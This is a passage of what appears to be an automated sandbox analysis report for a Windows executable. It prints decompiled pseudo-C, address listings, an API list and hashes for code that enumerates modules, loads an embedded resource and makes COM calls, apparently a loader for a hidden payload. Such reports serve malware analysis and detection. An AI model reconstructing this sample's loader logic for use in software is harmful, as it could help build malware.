                                                                        									__eflags = _t378;
                                                                        									if(_t378 >= 0) {
                                                                        										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                        										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                        										__eflags = _t383;
                                                                        										if(_t383 >= 0) {
                                                                        											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                        											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                        											__eflags = _t385;
                                                                        											if(_t385 >= 0) {
                                                                        												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                        												E00401870(_t563 + 0x44, _t552, "_._");
                                                                        												_t539 = __imp__#8;
                                                                        												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                        												 *_t539(_t563 + 0x94);
                                                                        												E00401870(_t563 + 0x3c, _t552, "___");
                                                                        												 *_t539(_t563 + 0xa4);
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                        												_t542 =  *(_t563 + 0x58);
                                                                        												__eflags = _t542;
                                                                        												if(_t542 == 0) {
                                                                        													E0040AD90(0x80004003);
                                                                        												}
                                                                        												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                        												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                        												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                        												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                        												_t543 = _t396;
                                                                        												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                        												__imp__#23(_t543, _t563 + 0x48);
                                                                        												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                        												_t564 = _t563 + 0xc;
                                                                        												__imp__#24(_t543);
                                                                        												_t399 =  *(_t564 + 0x54);
                                                                        												__eflags = _t399;
                                                                        												if(_t399 == 0) {
                                                                        													_t399 = E0040AD90(0x80004003);
                                                                        												}
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                        												__eflags = _t543;
                                                                        												if(_t543 != 0) {
                                                                        													__imp__#16(_t543); // executed
                                                                        												}
                                                                        												_t402 =  *(_t564 + 0x34);
                                                                        												__eflags = _t402;
                                                                        												if(_t402 == 0) {
                                                                        													_t402 = E0040AD90(0x80004003);
                                                                        												}
                                                                        												_t469 =  *(_t564 + 0x40);
                                                                        												_t555 = _t402;
                                                                        												__eflags = _t469;
                                                                        												if(_t469 == 0) {
                                                                        													_t531 = 0;
                                                                        													__eflags = 0;
                                                                        												} else {
                                                                        													_t531 =  *_t469;
                                                                        												}
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                        												__imp__#411(0xc, 0, 0);
                                                                        												_t471 =  *(_t564 + 0x3c);
                                                                        												__eflags = _t471;
                                                                        												if(_t471 == 0) {
                                                                        													E0040AD90(0x80004003);
                                                                        												}
                                                                        												_t405 =  *(_t564 + 0x38);
                                                                        												__eflags = _t405;
                                                                        												if(_t405 == 0) {
                                                                        													_t514 = 0;
                                                                        													__eflags = 0;
                                                                        												} else {
                                                                        													_t514 =  *_t405;
                                                                        												}
                                                                        												_t563 = _t564 - 0x10;
                                                                        												_t407 = _t563;
                                                                        												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                        												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                        												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                        												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                        												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                        												_t538 = __imp__#9; // 0x77b5cf00
                                                                        												_t538->i(_t563 + 0xa4);
                                                                        												E004019A0(_t563 + 0x38);
                                                                        												_t538->i(_t563 + 0x94);
                                                                        												_t413 =  *(_t563 + 0x3c);
                                                                        												__eflags = _t413;
                                                                        												if(_t413 != 0) {
                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                        												}
                                                                        												E004019A0(_t563 + 0x40);
                                                                        												_t415 =  *(_t563 + 0x34);
                                                                        												__eflags = _t415;
                                                                        												if(_t415 != 0) {
                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                        									__eflags = _t379 - _t563 + 0x178;
                                                                        									if(__eflags != 0) {
                                                                        										_push(_t379);
                                                                        										E0040B6B5(0, _t528, _t538, __eflags);
                                                                        										_t563 = _t563 + 4;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							_t369 =  *(_t563 + 0x54);
                                                                        							__eflags = _t369;
                                                                        							if(_t369 != 0) {
                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                        							}
                                                                        							_t370 =  *(_t563 + 0x58);
                                                                        							__eflags = _t370;
                                                                        							if(_t370 != 0) {
                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                        							}
                                                                        						}
                                                                        						goto L80;
                                                                        					} else {
                                                                        						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                        						_t565 = _t557 + 8;
                                                                        						_t547 = _t428;
                                                                        						_t520 = _t565 + 0x298;
                                                                        						while(1) {
                                                                        							_t429 =  *_t520;
                                                                        							if(_t429 !=  *_t547) {
                                                                        								break;
                                                                        							}
                                                                        							if(_t429 == 0) {
                                                                        								L7:
                                                                        								_t429 = 0;
                                                                        							} else {
                                                                        								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                        								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                        									break;
                                                                        								} else {
                                                                        									_t520 = _t520 + 2;
                                                                        									_t547 = _t547 + 2;
                                                                        									if(_t493 != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L7;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							L9:
                                                                        							if(_t429 != 0) {
                                                                        								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                        								_t557 = _t565 + 8;
                                                                        								_t548 = _t431;
                                                                        								_t488 = _t557 + 0x298;
                                                                        								while(1) {
                                                                        									_t432 =  *_t488;
                                                                        									__eflags = _t432 -  *_t548;
                                                                        									if(_t432 !=  *_t548) {
                                                                        										break;
                                                                        									}
                                                                        									__eflags = _t432;
                                                                        									if(_t432 == 0) {
                                                                        										L16:
                                                                        										_t432 = 0;
                                                                        									} else {
                                                                        										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                        										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                        										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                        											break;
                                                                        										} else {
                                                                        											_t488 = _t488 + 2;
                                                                        											_t548 = _t548 + 2;
                                                                        											__eflags = _t432;
                                                                        											if(_t432 != 0) {
                                                                        												continue;
                                                                        											} else {
                                                                        												goto L16;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									L18:
                                                                        									__eflags = _t432;
                                                                        									if(_t432 == 0) {
                                                                        										goto L10;
                                                                        									} else {
                                                                        										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                        										__eflags = _t435;
                                                                        										if(_t435 != 0) {
                                                                        											do {
                                                                        												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                        												_t566 = _t557 + 8;
                                                                        												_t549 = _t437;
                                                                        												_t490 = _t566 + 0x298;
                                                                        												while(1) {
                                                                        													_t438 =  *_t490;
                                                                        													__eflags = _t438 -  *_t549;
                                                                        													if(_t438 !=  *_t549) {
                                                                        														break;
                                                                        													}
                                                                        													__eflags = _t438;
                                                                        													if(_t438 == 0) {
                                                                        														L26:
                                                                        														_t438 = 0;
                                                                        													} else {
                                                                        														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                        														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                        														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                        															break;
                                                                        														} else {
                                                                        															_t490 = _t490 + 2;
                                                                        															_t549 = _t549 + 2;
                                                                        															__eflags = _t438;
                                                                        															if(_t438 != 0) {
                                                                        																continue;
                                                                        															} else {
                                                                        																goto L26;
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        													L28:
                                                                        													__eflags = _t438;
                                                                        													if(_t438 == 0) {
                                                                        														goto L10;
                                                                        													} else {
                                                                        														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                        														_t557 = _t566 + 8;
                                                                        														_t550 = _t439;
                                                                        														_t492 = _t557 + 0x298;
                                                                        														while(1) {
                                                                        															_t440 =  *_t492;
                                                                        															__eflags = _t440 -  *_t550;
                                                                        															if(_t440 !=  *_t550) {
                                                                        																break;
                                                                        															}
                                                                        															__eflags = _t440;
                                                                        															if(_t440 == 0) {
                                                                        																L34:
                                                                        																_t440 = 0;
                                                                        															} else {
                                                                        																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                        																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                        																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                        																	break;
                                                                        																} else {
                                                                        																	_t492 = _t492 + 2;
                                                                        																	_t550 = _t550 + 2;
                                                                        																	__eflags = _t440;
                                                                        																	if(_t440 != 0) {
                                                                        																		continue;
                                                                        																	} else {
                                                                        																		goto L34;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        															L36:
                                                                        															__eflags = _t440;
                                                                        															if(_t440 == 0) {
                                                                        																goto L10;
                                                                        															} else {
                                                                        																goto L37;
                                                                        															}
                                                                        															goto L81;
                                                                        														}
                                                                        														asm("sbb eax, eax");
                                                                        														asm("sbb eax, 0xffffffff");
                                                                        														goto L36;
                                                                        													}
                                                                        													goto L81;
                                                                        												}
                                                                        												asm("sbb eax, eax");
                                                                        												asm("sbb eax, 0xffffffff");
                                                                        												goto L28;
                                                                        												L37:
                                                                        												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                        												__eflags = _t442;
                                                                        											} while (_t442 != 0);
                                                                        										}
                                                                        										goto L38;
                                                                        									}
                                                                        									goto L81;
                                                                        								}
                                                                        								asm("sbb eax, eax");
                                                                        								asm("sbb eax, 0xffffffff");
                                                                        								goto L18;
                                                                        							} else {
                                                                        								L10:
                                                                        								CloseHandle(_t525);
                                                                        								return 0;
                                                                        							}
                                                                        							goto L81;
                                                                        						}
                                                                        						asm("sbb eax, eax");
                                                                        						asm("sbb eax, 0xffffffff");
                                                                        						goto L9;
                                                                        					}
                                                                        				}
                                                                        				L81:
                                                                        			}

































































































                                                                        0x004019f0
                                                                        0x004019f0
                                                                        0x004019fd
                                                                        0x00401a10
                                                                        0x00401a15
                                                                        0x00401a1a
                                                                        0x00401a1f
                                                                        0x00401a24
                                                                        0x00401a29
                                                                        0x00401a2e
                                                                        0x00401a33
                                                                        0x00401a38
                                                                        0x00401a3d
                                                                        0x00401a42
                                                                        0x00401a47
                                                                        0x00401a4c
                                                                        0x00401a51
                                                                        0x00401a56
                                                                        0x00401a5b
                                                                        0x00401a60
                                                                        0x00401a65
                                                                        0x00401a6a
                                                                        0x00401a6f
                                                                        0x00401a74
                                                                        0x00401a79
                                                                        0x00401a7e
                                                                        0x00401a83
                                                                        0x00401a88
                                                                        0x00401a8d
                                                                        0x00401a92
                                                                        0x00401a97
                                                                        0x00401a9c
                                                                        0x00401aa1
                                                                        0x00401aa6
                                                                        0x00401aab
                                                                        0x00401ab0
                                                                        0x00401ab9
                                                                        0x00401aba
                                                                        0x00401abf
                                                                        0x00401ac7
                                                                        0x0040248d
                                                                        0x0040248d
                                                                        0x00402496
                                                                        0x00401acd
                                                                        0x00401ad6
                                                                        0x00401ae2
                                                                        0x00401ae6
                                                                        0x00401af1
                                                                        0x00401af6
                                                                        0x00401afb
                                                                        0x00401b00
                                                                        0x00401b05
                                                                        0x00401b0a
                                                                        0x00401b0f
                                                                        0x00401b14
                                                                        0x00401b19
                                                                        0x00401b1e
                                                                        0x00401b23
                                                                        0x00401b28
                                                                        0x00401b2d
                                                                        0x00401b32
                                                                        0x00401b37
                                                                        0x00401b3c
                                                                        0x00401b41
                                                                        0x00401b46
                                                                        0x00401b4b
                                                                        0x00401b50
                                                                        0x00401b55
                                                                        0x00401b5a
                                                                        0x00401b5f
                                                                        0x00401b64
                                                                        0x00401b69
                                                                        0x00401b6e
                                                                        0x00401b73
                                                                        0x00401b78
                                                                        0x00401b7d
                                                                        0x00401b85
                                                                        0x00401b8d
                                                                        0x00401b95
                                                                        0x00401b9d
                                                                        0x00401ba4
                                                                        0x00401ba9
                                                                        0x00401bae
                                                                        0x00401bb3
                                                                        0x00401bb8
                                                                        0x00401bbd
                                                                        0x00401bc2
                                                                        0x00401bc7
                                                                        0x00401bcc
                                                                        0x00401bd1
                                                                        0x00401bd6
                                                                        0x00401bdb
                                                                        0x00401be0
                                                                        0x00401be5
                                                                        0x00401bea
                                                                        0x00401bef
                                                                        0x00401bf4
                                                                        0x00401bf9
                                                                        0x00401bfe
                                                                        0x00401c03
                                                                        0x00401c08
                                                                        0x00401c0d
                                                                        0x00401c12
                                                                        0x00401c17
                                                                        0x00401c1c
                                                                        0x00401c21
                                                                        0x00401c26
                                                                        0x00401c2b
                                                                        0x00401c30
                                                                        0x00401c35
                                                                        0x00401c3a
                                                                        0x00401c3f
                                                                        0x00401c44
                                                                        0x00401c48
                                                                        0x00401c4f
                                                                        0x00401dc3
                                                                        0x00401dc4
                                                                        0x00401de0
                                                                        0x00401de2
                                                                        0x00401de7
                                                                        0x00401dec
                                                                        0x00401df1
                                                                        0x00401df6
                                                                        0x00401dfb
                                                                        0x00401e00
                                                                        0x00401e05
                                                                        0x00401e0a
                                                                        0x00401e0f
                                                                        0x00401e14
                                                                        0x00401e19
                                                                        0x00401e1e
                                                                        0x00401e23
                                                                        0x00401e28
                                                                        0x00401e2d
                                                                        0x00401e32
                                                                        0x00401e37
                                                                        0x00401e3c
                                                                        0x00401e41
                                                                        0x00401e46
                                                                        0x00401e4b
                                                                        0x00401e50
                                                                        0x00401e55
                                                                        0x00401e5a
                                                                        0x00401e5f
                                                                        0x00401e64
                                                                        0x00401e69
                                                                        0x00401e6e
                                                                        0x00401e73
                                                                        0x00401e78
                                                                        0x00401e7d
                                                                        0x00401e82
                                                                        0x00401e86
                                                                        0x00401e8b
                                                                        0x00401e96
                                                                        0x00401e9a
                                                                        0x00401ea4
                                                                        0x00401eaf
                                                                        0x00401eba
                                                                        0x00401ebf
                                                                        0x00401ec4
                                                                        0x00401ec6
                                                                        0x00401ecb
                                                                        0x00401ece
                                                                        0x00401ed2
                                                                        0x00401ed4
                                                                        0x00401eef
                                                                        0x00401ed6
                                                                        0x00401edd
                                                                        0x00401ee2
                                                                        0x00401ee6
                                                                        0x00401ee9
                                                                        0x00401ee9
                                                                        0x00401ef7
                                                                        0x00401efc
                                                                        0x00401f02
                                                                        0x00401f08
                                                                        0x00401f0c
                                                                        0x00401f15
                                                                        0x00401f18
                                                                        0x00401f1a
                                                                        0x00401f1c
                                                                        0x00401f22
                                                                        0x00401f22
                                                                        0x00401f24
                                                                        0x00401f28
                                                                        0x00401f2f
                                                                        0x00401f33
                                                                        0x00401f33
                                                                        0x00401f40
                                                                        0x00401f45
                                                                        0x00401f4a
                                                                        0x00401f4b
                                                                        0x00401f50
                                                                        0x00401f58
                                                                        0x00401f58
                                                                        0x00401f58
                                                                        0x00401f58
                                                                        0x00401f33
                                                                        0x00401f63
                                                                        0x00401f63
                                                                        0x00401f69
                                                                        0x00401f72
                                                                        0x00401f72
                                                                        0x00401f72
                                                                        0x00401f73
                                                                        0x00401f75
                                                                        0x00401f7b
                                                                        0x00401f80
                                                                        0x00401f81
                                                                        0x00401f86
                                                                        0x00401f86
                                                                        0x00401f8c
                                                                        0x00401f8d
                                                                        0x00401f8d
                                                                        0x00401f9d
                                                                        0x00401fa2
                                                                        0x00401fa6
                                                                        0x00401fac
                                                                        0x00401faf
                                                                        0x00401fb6
                                                                        0x00401fbf
                                                                        0x00401fc4
                                                                        0x00401fc8
                                                                        0x00401fce
                                                                        0x00401fd3
                                                                        0x00401fe0
                                                                        0x00401fec
                                                                        0x00401ffe
                                                                        0x00402001
                                                                        0x00402006
                                                                        0x0040200b
                                                                        0x00402010
                                                                        0x00402015
                                                                        0x0040201a
                                                                        0x0040201f
                                                                        0x00402024
                                                                        0x00402029
                                                                        0x0040202e
                                                                        0x00402033
                                                                        0x00402038
                                                                        0x0040203d
                                                                        0x00402042
                                                                        0x00402047
                                                                        0x0040204c
                                                                        0x00402051
                                                                        0x00402056
                                                                        0x0040205b
                                                                        0x00402060
                                                                        0x00402065
                                                                        0x0040206a
                                                                        0x0040206f
                                                                        0x00402074
                                                                        0x00402079
                                                                        0x0040207e
                                                                        0x00402083
                                                                        0x00402088
                                                                        0x0040208d
                                                                        0x00402092
                                                                        0x00402097
                                                                        0x0040209c
                                                                        0x004020a1
                                                                        0x004020a5
                                                                        0x004020aa
                                                                        0x004020ae
                                                                        0x004020b4
                                                                        0x004020b6
                                                                        0x004020bb
                                                                        0x004020c0
                                                                        0x004020c5
                                                                        0x004020ca
                                                                        0x004020cf
                                                                        0x004020d4
                                                                        0x004020e1
                                                                        0x004020e6
                                                                        0x004020eb
                                                                        0x004020f0
                                                                        0x004020f5
                                                                        0x004020fa
                                                                        0x004020ff
                                                                        0x00402104
                                                                        0x00402109
                                                                        0x0040210e
                                                                        0x00402113
                                                                        0x00402118
                                                                        0x0040211d
                                                                        0x00402122
                                                                        0x00402127
                                                                        0x0040212c
                                                                        0x00402131
                                                                        0x00402136
                                                                        0x0040213b
                                                                        0x00402140
                                                                        0x00402145
                                                                        0x0040214a
                                                                        0x0040214f
                                                                        0x00402154
                                                                        0x00402159
                                                                        0x0040215e
                                                                        0x00402163
                                                                        0x00402167
                                                                        0x0040216c
                                                                        0x00402171
                                                                        0x00402177
                                                                        0x00402179
                                                                        0x0040217c
                                                                        0x0040217e
                                                                        0x00402183
                                                                        0x00402188
                                                                        0x0040218f
                                                                        0x00402196
                                                                        0x0040219a
                                                                        0x0040219e
                                                                        0x004021a2
                                                                        0x004021a4
                                                                        0x004021bc
                                                                        0x004021be
                                                                        0x004021c0
                                                                        0x004021c6
                                                                        0x004021ca
                                                                        0x004021e5
                                                                        0x004021ec
                                                                        0x004021f1
                                                                        0x00402213
                                                                        0x00402215
                                                                        0x00402217
                                                                        0x0040221d
                                                                        0x00402239
                                                                        0x0040223b
                                                                        0x0040223d
                                                                        0x00402243
                                                                        0x0040224d
                                                                        0x0040224f
                                                                        0x00402251
                                                                        0x00402260
                                                                        0x00402264
                                                                        0x00402269
                                                                        0x00402277
                                                                        0x0040227b
                                                                        0x00402286
                                                                        0x00402293
                                                                        0x004022af
                                                                        0x004022b1
                                                                        0x004022b5
                                                                        0x004022b7
                                                                        0x004022be
                                                                        0x004022be
                                                                        0x004022d7
                                                                        0x004022e8
                                                                        0x004022ef
                                                                        0x004022f6
                                                                        0x00402300
                                                                        0x00402304
                                                                        0x00402308
                                                                        0x00402315
                                                                        0x0040231a
                                                                        0x0040231e
                                                                        0x00402324
                                                                        0x00402328
                                                                        0x0040232a
                                                                        0x00402331
                                                                        0x00402331
                                                                        0x0040234e
                                                                        0x00402350
                                                                        0x00402352
                                                                        0x00402355
                                                                        0x00402355
                                                                        0x0040235b
                                                                        0x0040235f
                                                                        0x00402361
                                                                        0x00402368
                                                                        0x00402368
                                                                        0x0040236d
                                                                        0x00402371
                                                                        0x00402373
                                                                        0x00402375
                                                                        0x0040237b
                                                                        0x0040237b
                                                                        0x00402377
                                                                        0x00402377
                                                                        0x00402377
                                                                        0x00402390
                                                                        0x00402396
                                                                        0x0040239c
                                                                        0x004023a0
                                                                        0x004023a2
                                                                        0x004023a9
                                                                        0x004023a9
                                                                        0x004023ae
                                                                        0x004023b2
                                                                        0x004023b4
                                                                        0x004023ba
                                                                        0x004023ba
                                                                        0x004023b6
                                                                        0x004023b6
                                                                        0x004023b6
                                                                        0x004023ce
                                                                        0x004023d1
                                                                        0x004023d3
                                                                        0x004023dd
                                                                        0x004023ec
                                                                        0x004023ef
                                                                        0x004023fe
                                                                        0x00402401
                                                                        0x00402403
                                                                        0x00402411
                                                                        0x00402417
                                                                        0x00402424
                                                                        0x00402426
                                                                        0x0040242a
                                                                        0x0040242c
                                                                        0x00402434
                                                                        0x00402434
                                                                        0x0040243a
                                                                        0x0040243f
                                                                        0x00402443
                                                                        0x00402445
                                                                        0x0040244d
                                                                        0x0040244d
                                                                        0x00402445
                                                                        0x00402251
                                                                        0x0040223d
                                                                        0x0040244f
                                                                        0x0040245d
                                                                        0x0040245f
                                                                        0x00402461
                                                                        0x00402462
                                                                        0x00402467
                                                                        0x00402467
                                                                        0x0040245f
                                                                        0x004021ca
                                                                        0x0040246a
                                                                        0x0040246e
                                                                        0x00402470
                                                                        0x00402478
                                                                        0x00402478
                                                                        0x0040247a
                                                                        0x0040247e
                                                                        0x00402480
                                                                        0x00402488
                                                                        0x00402488
                                                                        0x00402480
                                                                        0x00000000
                                                                        0x00401c55
                                                                        0x00401c62
                                                                        0x00401c67
                                                                        0x00401c6a
                                                                        0x00401c6c
                                                                        0x00401c73
                                                                        0x00401c73
                                                                        0x00401c77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401c7b
                                                                        0x00401c8f
                                                                        0x00401c8f
                                                                        0x00401c7d
                                                                        0x00401c7d
                                                                        0x00401c83
                                                                        0x00000000
                                                                        0x00401c85
                                                                        0x00401c85
                                                                        0x00401c88
                                                                        0x00401c8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401c8d
                                                                        0x00401c83
                                                                        0x00401c98
                                                                        0x00401c9a
                                                                        0x00401cbd
                                                                        0x00401cc2
                                                                        0x00401cc5
                                                                        0x00401cc7
                                                                        0x00401cd0
                                                                        0x00401cd0
                                                                        0x00401cd2
                                                                        0x00401cd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401cd6
                                                                        0x00401cd8
                                                                        0x00401cec
                                                                        0x00401cec
                                                                        0x00401cda
                                                                        0x00401cda
                                                                        0x00401cdd
                                                                        0x00401ce0
                                                                        0x00000000
                                                                        0x00401ce2
                                                                        0x00401ce2
                                                                        0x00401ce5
                                                                        0x00401ce8
                                                                        0x00401cea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401cea
                                                                        0x00401ce0
                                                                        0x00401cf5
                                                                        0x00401cf5
                                                                        0x00401cf7
                                                                        0x00000000
                                                                        0x00401cf9
                                                                        0x00401d02
                                                                        0x00401d07
                                                                        0x00401d09
                                                                        0x00401d10
                                                                        0x00401d1d
                                                                        0x00401d22
                                                                        0x00401d25
                                                                        0x00401d27
                                                                        0x00401d30
                                                                        0x00401d30
                                                                        0x00401d32
                                                                        0x00401d34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d36
                                                                        0x00401d38
                                                                        0x00401d4c
                                                                        0x00401d4c
                                                                        0x00401d3a
                                                                        0x00401d3a
                                                                        0x00401d3d
                                                                        0x00401d40
                                                                        0x00000000
                                                                        0x00401d42
                                                                        0x00401d42
                                                                        0x00401d45
                                                                        0x00401d48
                                                                        0x00401d4a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d4a
                                                                        0x00401d40
                                                                        0x00401d55
                                                                        0x00401d55
                                                                        0x00401d57
                                                                        0x00000000
                                                                        0x00401d5d
                                                                        0x00401d6a
                                                                        0x00401d6f
                                                                        0x00401d72
                                                                        0x00401d74
                                                                        0x00401d80
                                                                        0x00401d80
                                                                        0x00401d82
                                                                        0x00401d84
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d86
                                                                        0x00401d88
                                                                        0x00401d9c
                                                                        0x00401d9c
                                                                        0x00401d8a
                                                                        0x00401d8a
                                                                        0x00401d8d
                                                                        0x00401d90
                                                                        0x00000000
                                                                        0x00401d92
                                                                        0x00401d92
                                                                        0x00401d95
                                                                        0x00401d98
                                                                        0x00401d9a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d9a
                                                                        0x00401d90
                                                                        0x00401da5
                                                                        0x00401da5
                                                                        0x00401da7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401da7
                                                                        0x00401da0
                                                                        0x00401da2
                                                                        0x00000000
                                                                        0x00401da2
                                                                        0x00000000
                                                                        0x00401d57
                                                                        0x00401d50
                                                                        0x00401d52
                                                                        0x00000000
                                                                        0x00401dad
                                                                        0x00401db6
                                                                        0x00401dbb
                                                                        0x00401dbb
                                                                        0x00401d10
                                                                        0x00000000
                                                                        0x00401d09
                                                                        0x00000000
                                                                        0x00401cf7
                                                                        0x00401cf0
                                                                        0x00401cf2
                                                                        0x00000000
                                                                        0x00401c9c
                                                                        0x00401c9c
                                                                        0x00401c9d
                                                                        0x00401caf
                                                                        0x00401caf
                                                                        0x00000000
                                                                        0x00401c9a
                                                                        0x00401c93
                                                                        0x00401c95
                                                                        0x00000000
                                                                        0x00401c95
                                                                        0x00401c4f
                                                                        0x00000000

                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                        • Module32Next.KERNEL32 ref: 00401D02
                                                                        • Module32Next.KERNEL32 ref: 00401DB6
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPBs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                        • API String ID: 2366190142-533690119
                                                                        • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                        • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 166 401991 call 401030 164->166 166->162
                                                                        C-Code - Quality: 84%
                                                                        			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				signed int _t12;
                                                                        				void* _t21;
                                                                        				int _t25;
                                                                        				void* _t30;
                                                                        				int _t32;
                                                                        				char* _t35;
                                                                        
                                                                        				_t21 = __edx;
                                                                        				_t35 = _a4;
                                                                        				_t17 = __ecx;
